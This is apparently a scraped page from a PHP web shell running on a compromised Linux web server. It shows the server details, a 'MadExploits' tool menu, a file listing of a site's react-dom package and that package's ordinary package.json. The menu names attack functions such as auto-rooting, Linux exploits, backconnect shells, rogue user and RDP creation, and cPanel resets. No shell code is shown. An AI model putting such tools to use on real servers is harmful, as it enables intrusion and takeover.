Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
react-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
cjs
[ DIR ]
drwxrwxr-x
umd
[ DIR ]
drwxrwxr-x
LICENSE
1.06
KB
-rw-rw-r--
README.md
1.08
KB
-rw-rw-r--
client.js
619
B
-rw-rw-r--
index.js
1.33
KB
-rw-rw-r--
package.json
1.32
KB
-rw-rw-r--
profiling.js
1.33
KB
-rw-rw-r--
server.browser.js
658
B
-rw-rw-r--
server.js
58
B
-rw-rw-r--
server.node.js
646
B
-rw-rw-r--
test-utils.js
220
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "react-dom", "version": "18.2.0", "description": "React package for working with the DOM.", "main": "index.js", "repository": { "type": "git", "url": "https://github.com/facebook/react.git", "directory": "packages/react-dom" }, "keywords": [ "react" ], "license": "MIT", "bugs": { "url": "https://github.com/facebook/react/issues" }, "homepage": "https://reactjs.org/", "dependencies": { "loose-envify": "^1.1.0", "scheduler": "^0.23.0" }, "peerDependencies": { "react": "^18.2.0" }, "files": [ "LICENSE", "README.md", "index.js", "client.js", "profiling.js", "server.js", "server.browser.js", "server.node.js", "test-utils.js", "cjs/", "umd/" ], "exports": { ".": "./index.js", "./client": "./client.js", "./server": { "deno": "./server.browser.js", "worker": "./server.browser.js", "browser": "./server.browser.js", "default": "./server.node.js" }, "./server.browser": "./server.browser.js", "./server.node": "./server.node.js", "./profiling": "./profiling.js", "./test-utils": "./test-utils.js", "./package.json": "./package.json" }, "browser": { "./server.js": "./server.browser.js" }, "browserify": { "transform": [ "loose-envify" ] } }
Close